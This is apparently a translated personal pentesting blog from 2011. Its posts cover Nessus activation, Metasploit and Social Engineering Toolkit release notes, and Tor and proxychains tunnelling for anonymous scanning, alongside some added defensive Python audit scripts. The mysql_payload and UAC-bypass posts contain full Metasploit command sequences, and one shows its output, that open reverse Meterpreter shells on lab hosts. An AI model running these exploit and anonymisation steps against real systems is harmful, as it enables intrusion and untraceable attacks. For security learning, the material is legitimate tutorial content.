update blog

update.update.update.

Nessus activation – BackTrack 5

Nessus is installed by default on BackTrack 5, but it has to be activated before it can be used. Activation also serves to update the Nessus plugins.
The steps to activate Nessus on BackTrack 5 are as follows:
1. Register on the Nessus website at http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code to obtain an activation code. There are two subscription options, HomeFeed or Professional Feed; pick the one that fits your needs.
The activation code will then be sent to your e-mail address.
2. Activate Nessus from the command line.
If you are behind a proxy, adjust the Nessus settings in /opt/nessus/etc/nessus/nessus-fetch.rc.
Example configuration:

proxy=192.168.10.2
proxy_port=8080
proxy_username=isi_dengan_user_name_jika_ada
proxy_password=passwordnya_juga

Activate Nessus with the command:

root@vee-lab:/opt/nessus/bin# ./nessus-fetch --register KodeRegistrasiNessus

If it succeeds, a notification like the following appears:

Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org

Nessus will then download the latest plugins from its website.
3. Add a user for logging in.
Change to the sbin directory (cd /opt/nessus/sbin)
and run the command:

./nessus-adduser
Login : ian-hrm
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that ian-hrm has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)

Login : ian-hrm
Password : ***********
This user will have 'admin' privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added
root@vee-lab:/opt/nessus/sbin#

4. Start the Nessus service:

/etc/init.d/nessusd start

5. Open a browser and log in to the Nessus administration page at https://ip_address_nessus:8834
Then wait a while: Nessus will load the plugins it has just downloaded. Once that finishes the login form appears; enter the username and password you configured earlier.

happy scanning

-ian hrm

metasploit framework v3.7.0 released


Today Metasploit Framework v3.7.0 was released. There are several changes compared with the previous version, and it has certainly gotten better.
Below are the release notes from the Metasploit team:

Statistics
Metasploit now ships with 685 exploit modules, 355 auxiliary modules, and 39 post modules.
35 new exploits, 17 post-exploitation modules, and 15 auxiliary modules have been added since the last release.

Feature highlights

Support for SMB signing, enabling pass-the-hash and stolen password attacks against Windows 2008 Server environments.
The Microsoft SQL Server mixin (and all modules) now supports NTLM authentication.
Data import backend has undergone a rewrite, speeding up most import tasks by a factor of four.
OS information is now normalized to make fingerprinting more accurate and easier to deal with.

Highlights from the new modules include:

Apple iOS Backup File Extraction: Extract sensitive data from iTunes backup files (location, call history, SMS content, pictures, etc).
Exploits for two different Adobe Flash vulnerabilities exploited in the wild.
Code execution modules for MySQL and PostgreSQL when a valid login is available.
Exploit for the Accellion File Transfer Appliance Default Encryption Key flaw found by Rapid7.
Over ten new exploits for HP Network Node Manager (plus an HP OpenView exploit).
Post-exploitation module for privilege escalation through the .NET Optimizer Service.
Post-exploitation modules for stealing stored WinSCP and VNC passwords.

Download: http://metasploit.com/download/

pentesting database server

When pentesting a network we sometimes come across several network resources, among them web servers, DNS servers, e-mail and so on. Take pentesting a web server in particular: looking at the website's configuration, the database server is sometimes separate from the web server. So how does one take control of the remote database server, knowing the important details such as the username, the password and the name of the database in use?

I will try to give a solution for the case above. The topology used can be seen in the picture. The tool is the usual one: Metasploit again. As it happens, a few months ago (I forget exactly when) the Metasploit team added two modules for database hacking, one for MySQL and one for PostgreSQL.

1. MySQL Server
Pentesting MySQL can be done in several ways, for example with Metasploit or with the MySQL blob technique, but the core is the same: a new function (a user defined function) such as sys_eval or sys_exec is added to the server and then used to execute the payload. For more detail on UDF functions see http://www.mysqludf.org/
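The defender's view of the same path, as an added example that is not from the original post: the UDF technique needs a SQL account that can write a library into plugin_dir (the FILE privilege with secure_file_priv unset) and it leaves a registered function and a library file behind. The audit below takes the rows a DBA would get from SHOW GLOBAL VARIABLES, mysql.func and mysql.user and reports those conditions. The server data is constructed for the example, the sys_* function names are the ones exported by lib_mysqludf_sys, and the 8-letter random library name mirrors the filename that appears in the exploit transcript further down.

```python
import re

# Constructed sample data (not taken from the post) standing in for the output of
#   SHOW GLOBAL VARIABLES;
#   SELECT name, dl FROM mysql.func;
#   SELECT user, host, File_priv FROM mysql.user;
SAMPLE_VARIABLES = {
    "version": "5.5.11",
    "plugin_dir": "C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/",
    "secure_file_priv": "",      # empty: SELECT ... INTO DUMPFILE may write anywhere
    "local_infile": "ON",
    "have_ssl": "DISABLED",
}
SAMPLE_FUNCS = [
    ("sys_exec", "itfkdrZG.dll"),                     # random library name, as in the transcript
    ("lib_mysqludf_sys_info", "lib_mysqludf_sys.so"),
]
SAMPLE_USERS = [
    ("root", "localhost", "Y"),
    ("root", "%", "Y"),                               # root reachable from any host
    ("webapp", "192.168.10.%", "Y"),                  # application account holding FILE
    ("reporting", "%", "N"),
]

# Functions exported by lib_mysqludf_sys: each one lets a SQL user run OS commands
SYS_UDF_NAMES = {"sys_exec", "sys_eval", "sys_get", "sys_set"}
# The mysql_payload module drops its library under an 8-letter random name
RANDOM_LIB_RE = re.compile(r"^[A-Za-z]{8}\.(dll|so)$")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def audit_udf_exposure(variables, funcs, users):
    """Return (severity, message) findings for the UDF command-execution path:
    command UDFs already registered, a plugin_dir that SQL can write into, and
    accounts holding the FILE privilege needed to do so."""
    findings = []

    for name, library in funcs:
        if name in SYS_UDF_NAMES:
            findings.append(("high", f"command-execution UDF {name} is loaded from {library}"))
        if RANDOM_LIB_RE.match(library):
            findings.append(("high", f"UDF {name} uses a randomly named library {library}"))

    # secure_file_priv is read-only at runtime; it has to be set in my.cnf / my.ini
    if variables.get("secure_file_priv", "") == "":
        findings.append(("medium", "secure_file_priv is empty: INTO DUMPFILE can write into plugin_dir"))
    if variables.get("local_infile", "OFF").upper() == "ON":
        findings.append(("low", "local_infile is ON"))
    if variables.get("have_ssl", "").upper() != "YES":
        findings.append(("low", "client connections are not protected by SSL"))

    for user, host, file_priv in users:
        if file_priv != "Y":
            continue
        if host not in LOCAL_HOSTS:
            findings.append(("high", f"'{user}'@'{host}' holds FILE privilege from a remote host"))
        elif user != "root":
            findings.append(("medium", f"'{user}'@'{host}' holds FILE privilege"))
    return findings


def count_by_severity(findings):
    """Tally findings per severity so a report can lead with the worst ones."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for severity, _ in findings:
        counts[severity] += 1
    return counts


if __name__ == "__main__":
    for severity, message in audit_udf_exposure(SAMPLE_VARIABLES, SAMPLE_FUNCS, SAMPLE_USERS):
        print(f"[{severity:6}] {message}")
```

Against a real server the three queries become the inputs. The remediation the findings point at is secure_file_priv set to a directory other than plugin_dir (in the configuration file, since it cannot be changed at runtime), FILE granted only to local administrative accounts, and DROP FUNCTION for any UDF nobody can account for.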

Several modules are used (auxiliary and exploit):

Auxiliary
=========

Name Description
---- -----------
admin/mysql/mysql_enum MySQL Enumeration Module
admin/mysql/mysql_sql MySQL SQL Generic Query

exploit

Name Description
---- -----------
windows/mysql/mysql_payload Oracle MySQL for Microsoft Windows Payload Execution

The MySQL configuration can be inspected with the auxiliary module admin/mysql/mysql_enum:

msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 3306 yes The target port
USERNAME no The username to authenticate as

msf auxiliary(mysql_enum) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_enum) > set PASSWORD ian123
PASSWORD => ian123
msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*] MySQL Version: 5.5.11
[*] Compiled for the following OS: Win32
[*] Architecture: x86
[*] Server Hostname: vee-lab
[*] Data Directory: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.5\Data\
[*] Logging of queries and logins: OFF
[*] Old Password Hashing Algorithm OFF
[*] Loading of local files: ON
[*] Logins with old Pre-4.1 Passwords: OFF
[*] Allow Use of symlinks for Database Files: YES
[*] Allow Table Merge:
[*] SSL Connection: DISABLED

--------- SNIP ---------

To attack that database, use the exploit mysql_payload:

msf > use exploit/windows/mysql/mysql_payload
msf exploit(mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mysql_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(mysql_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(mysql_payload) > set USERNAME root
USERNAME => root
msf exploit(mysql_payload) > set PASSWORD ian123
PASSWORD => ian123
msf exploit(mysql_payload) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.10.2:4444
msf exploit(mysql_payload) > [*] Checking target architecture...
[*] Checking for sys_exec()...
[*] Checking target architecture...
[*] Checking for MySQL plugin directory...
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/itfkdrZG.dll...
[*] Checking for sys_exec()...
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[*] Command Stager progress - 2.93% done (2998/102246 bytes)
[*] Command Stager progress - 4.40% done (4497/102246 bytes)
[*] Command Stager progress - 5.86% done (5996/102246 bytes)
[*] Command Stager progress - 7.33% done (7495/102246 bytes)
[*] Command Stager progress - 8.80% done (8994/102246 bytes)
[*] Command Stager progress - 10.26% done (10493/102246 bytes)
[*] Command Stager progress - 11.73% done (11992/102246 bytes)
[*] Command Stager progress - 13.19% done (13491/102246 bytes)
[*] Command Stager progress - 14.66% done (14990/102246 bytes)
……………………………..
[*] Command Stager progress - 86.50% done (88441/102246 bytes)
[*] Command Stager progress - 87.96% done (89940/102246 bytes)
[*] Command Stager progress - 89.43% done (91439/102246 bytes)
[*] Command Stager progress - 90.90% done (92938/102246 bytes)
[*] Command Stager progress - 92.36% done (94437/102246 bytes)
[*] Command Stager progress - 93.83% done (95936/102246 bytes)
[*] Command Stager progress - 95.29% done (97435/102246 bytes)
[*] Command Stager progress - 96.76% done (98934/102246 bytes)
[*] Command Stager progress - 98.19% done (100400/102246 bytes)
[*] Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Meterpreter session 1 opened (192.168.10.2:4444 -> 192.168.10.11:1041) at 2011-05-03 16:04:07 +0700
msf exploit(mysql_payload) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
628 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
676 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
700 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
744 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
756 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
912 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
980 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1064 SbieSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Sandboxie\SbieSvc.exe
1080 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1208 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1240 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1588 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1644 explorer.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\Explorer.EXE
1736 ehtray.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\ehome\ehtray.exe
1744 SharedIntApp.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\SIA\SharedIntApp.exe
1752 prl_cc.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\prl_cc.exe
1760 jusched.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Common Files\Java\Java Update\jusched.exe
1772 SbieCtrl.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Sandboxie\SbieCtrl.exe

Earthquake in Kendari


mmmmmm..
Early this morning I got an SMS from a cousin.

Kak Barsan, the earthquake was really strong and it has already struck 3 times. Kaaaaaaakk, please pray for us here.

Several more SMS followed in the same tone.. oh dear
I opened the BMKG website right away.. it turned out it was already posted there

Luckily there is no tsunami potential. Ya Allah, may they all be safe. Amin

pentesting through tor – escape via tor

In the previous post I explained how to use an ordinary proxy for pentesting. This time I will try to explain a little about using Tor for information gathering, scanning or pentesting.
A definition of Tor can be found on Wikipedia.
My own short explanation of Tor:
Tor is a virtual tunnel that makes it possible to 'hide' our identity while browsing the internet. Its function is the same as any other proxy, anonymity, but the network structure is different. The Tor network has its own terms, among them Tor node and Tor exit node.
When the Tor application is first used, we connect to Tor nodes, of which there is more than one. Each Tor node in turn connects to another Tor node over an encrypted connection. That is why the Tor network is really slow.. but no matter.. the important thing is that it can be used for a pentest. :)
After passing through several Tor nodes, the packet is forwarded to the next network device, called the Tor exit node. From there the packet is forwarded to its real destination. Yes, rather roundabout.
Supporting applications for Tor can be found on the Tor website.
Once connected to the Tor network, the Tor application offers a SOCKS5 proxy on localhost (127.0.0.1) port 9050 for other applications to communicate through.
The pentest applications used are not much different from pentesting through an ordinary proxy, for example proxychains, prtunnel, socat. There are just a few additional tools that will be used.
1. torsocks
This application is similar to proxychains; the difference is that torsocks can only be used with the Tor network.
Installation is quite easy: download torsocks and install as usual (make, make install).
Usage:

usewithtor nama_program

Example of banner grabbing using torsocks:

usewithtor nc -v 203.xxx.xxx.xxx 80
Connection to 203.xxx.xxx.xxx 80 port [tcp/http] succeeded!
GET / HTTP/1.0

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 11:34:11 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: http://blablabla.com/
Server: id8

301 Moved Permanently

301 Moved Permanently


nginx/0.7.65

torsocks 'instructs' netcat (nc) to make its connection to the specified IP through the Tor network.

2. tortunnel
tortunnel is an application developed by Moxie Marlinspike (tortunnel).
Before installing, make sure the Boost library is correctly installed. :)
Unlike the other Tor applications, tortunnel does not connect through Tor nodes; it connects directly to a Tor exit node, so the path taken is shorter and the connection is not that slow.. :)
A list of Tor exit node IPs can be found in the Tor exit node list; choose an IP with status "Exit", "Running" and "Fast".
Example:

root@ian:~# torproxy 189.103.65.55
torproxy 0.2 by Moxie Marlinspike.
Retrieving directory listing...
Connecting to exit node: 189.103.65.55:443
SSL Connection to node complete. Setting up circuit.
Connected to Exit Node. SOCKS proxy ready on 5060.

189.103.65.55 is the IP of one of the Tor exit nodes. Port 5060, type SOCKS5, can then be used for communication. The next step is to configure proxychains.
Config:

socks5 127.0.0.1 5060

Example of an nmap scan tunnelled through tortunnel:

proxychains nmap -sT -p80,443,22,21,53 203.xxx.xxx.xxx
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-20 19:26 WIT
|S-chain|-<>-127.0.0.1:5060-<>-203.xxx.xxx.xxx:80-<><>-OK
|S-chain|-<>-127.0.0.1:5060-<>-203.xxx.xxx.xxx:21-<--timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:5060-<>-203.xxx.xxx.xxx:443-<--timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:5060-<>-203.xxx.xxx.xxx:22-<--timeout
|S-chain|-<>-127.0.0.1:5060-<>-203.xxx.xxx.xxx:53-<--timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 203.xxx.xxx.xxx
Host is up (2.7s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
53/tcp closed domain
80/tcp open http
443/tcp closed https

Output from tortunnel:

Got SOCKS Connection...
Got SOCKS Request: 203.xxx.xxx.xxx:80
Successfully opened Tor exit Node stream...
Got SOCKS Connection...
CIRCUIT: Close called...
Got SOCKS Request: 203.xxx.xxx.xxx:21
Error opening stream: system:111
Got SOCKS Connection...
Got SOCKS Request: 203.xxx.xxx.xxx:443
Error opening stream: system:111
Got SOCKS Connection...
Got SOCKS Request: 203.xxx.xxx.xxx:22
Got SOCKS Connection...
Got SOCKS Request: 203.xxx.xxx.xxx:53
Error opening stream: system:111
Error opening stream: system:111

All sorts of applications can be combined with tortunnel, for example netcat, nmap, Metasploit and so on.. it depends on everyone's own creativity...
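The flip side for whoever operates the scanned host, added here as an example and not part of the original post: every connection made this way arrives from a Tor exit node, so a web server operator can recognise it by matching the client addresses in the access log against a published exit-node list. The exit list and the combined-format log lines below are constructed (documentation-range addresses, not real exit nodes); the list format assumed is one address per line with '#' comments.

```python
import re
from collections import Counter
from ipaddress import ip_address

# Constructed exit-node list: one address per line, '#' comments allowed.
# The addresses come from documentation ranges and are not real exit nodes.
SAMPLE_EXIT_LIST = """\
# exit addresses, constructed for this example
198.51.100.17
203.0.113.44
192.0.2.9
not-an-address
"""

# Constructed "combined" format access log, with one line that is not a log entry
SAMPLE_ACCESS_LOG = """\
198.51.100.17 - - [20/Apr/2011:11:34:11 +0000] "GET / HTTP/1.0" 301 185 "-" "-"
10.0.0.5 - - [20/Apr/2011:11:35:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.17 - - [20/Apr/2011:11:35:40 +0000] "GET /admin HTTP/1.1" 404 162 "-" "-"
203.0.113.44 - - [20/Apr/2011:11:36:13 +0000] "HEAD / HTTP/1.1" 301 0 "-" "curl/7.21"
this line is not a log entry
"""

# client ip, ident, user, [time], "request", status ... (rest of the line ignored)
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) '
)


def load_exit_list(text):
    """Parse the exit list into a set of normalised address strings; blank lines,
    comments and anything that is not a valid IP address are skipped."""
    exits = set()
    for line in text.splitlines():
        candidate = line.split("#", 1)[0].strip()
        if not candidate:
            continue
        try:
            exits.add(str(ip_address(candidate)))   # validates and normalises
        except ValueError:
            continue
    return exits


def flag_tor_requests(log_text, exits):
    """Return (hits, per_ip_counts) for log entries whose client IP is a known exit."""
    hits, counts = [], Counter()
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue                 # unparseable line: skip rather than abort the run
        ip = m.group("ip")
        if ip in exits:
            hits.append({"ip": ip, "time": m.group("time"),
                         "request": m.group("request"), "status": int(m.group("status"))})
            counts[ip] += 1
    return hits, counts


if __name__ == "__main__":
    exits = load_exit_list(SAMPLE_EXIT_LIST)
    hits, counts = flag_tor_requests(SAMPLE_ACCESS_LOG, exits)
    for h in hits:
        print(f"{h['time']}  {h['ip']:15}  {h['status']}  {h['request']}")
    print("requests per exit node:", dict(counts))
```

Exit lists change by the hour, so the list has to be refreshed before each run; a hit is a signal to look at the request pattern (here a probe for /admin that drew a 404), not proof of hostile intent on its own.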

Enjoy

— LD ian hrm a.k.a laharisi —

pentest through tunneling – escape via proxy


ian hrm here again. This time I will try to share a little technique on tunneling. Tunneling is one of the techniques used to avoid being tracked while doing a penetration test. In general it hides the IP address we use by making use of other network resources, for example a proxy, a host, a server and so on. There are several kinds of tunneling, depending on the situation: for example tunneling through a proxy, through Tor, or over SSH.

Some of the tools I use most often are:

1. Proxychains
mmm.. An application I use very often. One of its strengths is that it can tunnel through more than 5 proxies.. at the cost of bandwidth being eaten up, i.e. it gets slow.. It can be downloaded from http://proxychains.sourceforge.net/.
Those who use BackTrack regularly already have it included. Ubuntu users can install it with sudo apt-get install proxychains.
Configuration is also quite simple. The config file is usually at /etc/proxychains.conf.
Config:

Protokol Alamat_Ip_Proxy Port_proxy

Example:

http 192.168.10.100 8080

Once the configuration is ready, just run proxychains.

root@vee-lab:~# proxychains
ProxyChains-3.1 (http://proxychains.sf.net)
usage:
proxychains <prog> [args]

proxychains needs an additional application that it runs through the tunnel..
Don't worry... an example case follows later.. :)
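A parser for this file format, added as an example and not part of proxychains or of the original post: it reads the global options and the [ProxyList] section described above and validates each 'type host port [user pass]' entry, rejecting an unknown proxy type, a host that is not an IPv4 literal (the list takes addresses, not names) and an out-of-range port. The sample configuration is constructed; the directive names are those of proxychains 3.x.

```python
import re

# Constructed sample in the /etc/proxychains.conf layout (not the post's own file)
SAMPLE_CONF = """\
# proxychains.conf  VER 3.1 (constructed sample)
dynamic_chain
#strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# type  host            port  [user pass]
http    192.168.10.100  8080
socks5  127.0.0.1       5060
socks4  10.0.0.1        1080  alice secret
"""

CHAIN_MODES = {"dynamic_chain", "strict_chain", "random_chain"}
TIMEOUTS = {"tcp_read_time_out", "tcp_connect_time_out"}
PROXY_TYPES = {"http", "socks4", "socks5"}
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


class ConfigError(ValueError):
    """Raised with the offending line number when the file would not work."""


def _is_ipv4(host):
    return bool(IPV4_RE.match(host)) and all(int(o) <= 255 for o in host.split("."))


def parse_proxychains_conf(text):
    """Parse a proxychains.conf into a dict. Options before [ProxyList] are
    recorded; every entry after it is validated as 'type host port [user pass]'."""
    cfg = {"chain_mode": None, "proxy_dns": False, "timeouts": {}, "other": [], "proxies": []}
    in_list = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()        # drop comments and surrounding space
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        parts = line.split()
        if not in_list:
            if parts[0] in CHAIN_MODES and len(parts) == 1:
                if cfg["chain_mode"] is not None:
                    raise ConfigError(f"line {lineno}: second chain mode {parts[0]}")
                cfg["chain_mode"] = parts[0]
            elif parts[0] == "proxy_dns" and len(parts) == 1:
                cfg["proxy_dns"] = True
            elif parts[0] in TIMEOUTS and len(parts) == 2 and parts[1].isdigit():
                cfg["timeouts"][parts[0]] = int(parts[1])
            else:
                cfg["other"].append(line)          # directives this parser does not model
            continue
        if len(parts) not in (3, 5):
            raise ConfigError(f"line {lineno}: expected 'type host port [user pass]'")
        ptype, host, port = parts[0], parts[1], parts[2]
        if ptype not in PROXY_TYPES:
            raise ConfigError(f"line {lineno}: unknown proxy type {ptype}")
        if not _is_ipv4(host):
            raise ConfigError(f"line {lineno}: host must be an IPv4 literal, got {host}")
        if not port.isdigit() or not 1 <= int(port) <= 65535:
            raise ConfigError(f"line {lineno}: bad port {port}")
        entry = {"type": ptype, "host": host, "port": int(port)}
        if len(parts) == 5:
            entry["user"], entry["password"] = parts[3], parts[4]
        cfg["proxies"].append(entry)
    if not cfg["proxies"]:
        raise ConfigError("no proxies listed under [ProxyList]")
    return cfg


if __name__ == "__main__":
    parsed = parse_proxychains_conf(SAMPLE_CONF)
    print(parsed["chain_mode"], "proxy_dns" if parsed["proxy_dns"] else "no proxy_dns")
    for hop in parsed["proxies"]:
        print(f"  {hop['type']:6} {hop['host']}:{hop['port']}")
```

The parsed structure lists exactly the hops traffic will traverse, which is the thing worth checking before a run: a typo in the list is otherwise only noticed when connections time out.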

Social Engineering v1.3 "artillery edition"


It has been almost a week since version 1.3 of the Social Engineering Toolkit was released; I only have time now to review it.. hehehehe..
This tool is the creation of David 'Rel1k' Kennedy.
Version 1.3 adds several features, among them the social engineering shell and RATTE HTTP tunneling.

Change log:

* Updated the web-gui interface to reflect all new PDF exploits
* Updated the web-gui interface to reflect all new client-side exploits
* Added a new setup.py installer file for debian based systems only, will add manual install options later
* Updated all of the powershell HID attack vectors to fix bugs and support multi-language support. Thanks padzero!
* Added AES encryption to the socket communication, it requires Crypto.Cipher which is from the PyCrypto libraries.
* Added python-crypto to the installer setup.py installation
* Fixed web-gui alignment on new options so they match up properly to SET-interface
* Added better error handling around the openssl python module if it isn’t installed
* Added download_file capabilities into the SET interactive shell.
* Added upload_file capabilities into the SET interactive shell.
* Added shell capabilities into the SET interactive shell.
* Added ssh_tunneling capabilities into the SET interactive shell. You can tunnel any port you want to over ssh
* Added a teensy Gnome wget payload thanks to Hugo Caron (y0ug)!
* Fixed a bug in a menu where teensy payload return to menu would not return properly to main menu
* Fixed a bug where the Mass Mailer Menu didn’t properly return back to main menu when specified.
* Added process list in the SET interactive shell.
* Added process kill in the SET interactive shell.
* Added dsniff to set_config as an option instead of ettercap, can use either one.
* Added centralized logging in SET, log files will now be dumped to src/logs/set_logfile.log
* Added logging to main SET interface, handles main SET interactive shell errors
* Added logging to arp_cache.py file, handles arp cache errors
* Added logging to hijacking.py file, handles dll_hijacking errors
* Added logging to harvester.py file, handles credential harvesting errors
* Added logging to payloadgen.py file, handles payload generation errors
* Fixed a bug where if site wouldn’t clone properly it would just exit SET, it now just returns back to main menu.
* Fixed a bug where the new addition to dnsspoof would not properly kill dnsspoof when exiting SET, it now terminates when an exception is thrown
* Added logging to web_server.py file, handles main SET web server errors
* Added logging to spawn.py file, handles main spawn handles for SET
* Added the ability to specify high priority during emails or not, thanks Jonathan Murray!
* Added new core module library called log(error) will centralize log messages through core function calls
* Added the new Sun Java Applet2ClassLoader Remote Code Execution Exploit from Frederic Hoguin and jduck that was recently added to Metasploit
* Moved version number to src/main/ instead of src root
* Added the new RATTE payloads to SET that was created by Thomas Werth to circumvent firewall based restrictions. Awesome addition!
* Added the new DSNIFF changes to the web gui to ensure that when the option is enabled in set_config it now gets picked up in web gui
* Fixed a bug in web gui where if HTML/Plain wasn’t specified, it would not properly run the answer file to launch the attack
* Added the SET interactive shell to the Java Applet Attack Vector on the SET web-gui
* Fixed a mishandling of OS.Error exceptions in spawn.py which caused SET to spit out a pexpect exceptions error when using KeyBoardInterrupt exceptions handler
* Deleted the database directory under src, was no longer needed
* Added the Sun Java Applet2ClassLoader Remote Code Execution by Frederic Hoguin and jduck to the web gui interface
* Added RATTE to the SET Web GUI under the payload selection area, it’s only to be used for the Java Applet attack.
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability from the Metasploit Framework to SET
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability to the SET web gui.
* Added six more spear-phishing templates that can be found under the spear-phish attack menu
* Added a new attack vector called the SET Wireless Attack Vector, this will create a fake access point and redirect all traffic to you
* Added the ability to stop all services/processes started by the SET Wireless Attack vector, it is now under the options menu
* Added the Thomas Werth RATTE module to third party modules as well as under the main payload section. Great example to tweak third party modules and add things.
* Added airbase-ng to SET in case it is not installed. Thanks to Mister-X for the approval to include it into SET!
* Added new wireless attack vector to the SET web gui, menus have been changed slightly
* Added the new templates recently added to the SET web gui, they are under the spear-phish menu
* Added a binary rewrite of UPX encoder stubs so that it randomizes a three character alphanumeric to remove UPX from the binary. A bit better obfuscation for A/V detection.
* Fixed a bug where upx encoding wasn’t working properly and wouldn’t encode the right binary
* Added a new core module called core.upx(path_to_file) which will automatically encode the file via upx and rewrite the UPX stubs with a three character alphanumeric stub
* Fixed a bug in the SET interactive shell that was causing it to fail if the pycrypto modules were not installed.

Not bad... but I was curious about RATTE HTTP tunneling.. so I tried it right away

This application uses HTTP tunneling, so when traced with Wireshark the traffic shows up as ordinary HTTP.. mmmm.. pretty cool..

Good enough for doing pentests. I have not had a chance to try the SET custom shell yet because it still has a small error; I am modifying the script..

— selamat menikmati —

Privilege escalation – windows UAC bypass

The previous tutorial explained privilege escalation by exploiting an operating system weakness. That technique only works on Windows Vista, 2008 and Windows Seven that have not been patched. Once Windows is patched, the technique with the schelevator script no longer works, so a new technique is needed to get around this. One technique that can be used is to bypass UAC (User Account Control).

According to Wikipedia:

User Account Control (UAC) is a technology and security infrastructure introduced with Microsoft's Windows Vista and Windows Server 2008 operating systems, with a more relaxed version also present in Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

So when a program that has no Windows publisher certificate is run with administrator rights, Windows shows a warning like the one in the picture above.

Tools:

- Metasploit v3.7.0-dev
- OS: Windows 7 x64, fully patched

Without UAC bypass:

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 682 exploits - 350 auxiliary
+ -- --=[ 218 payloads - 27 encoders - 8 nops
=[ svn r12260 updated today (2011.04.06)

resource (multihander.rc)> use exploit/multi/handler
resource (multihander.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (multihander.rc)> set LHOST 172.16.16.2
LHOST => 172.16.16.2
resource (multihander.rc)> set LPORT 443
LPORT => 443
resource (multihander.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.16.2:443
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (749056 bytes) to 172.16.16.15
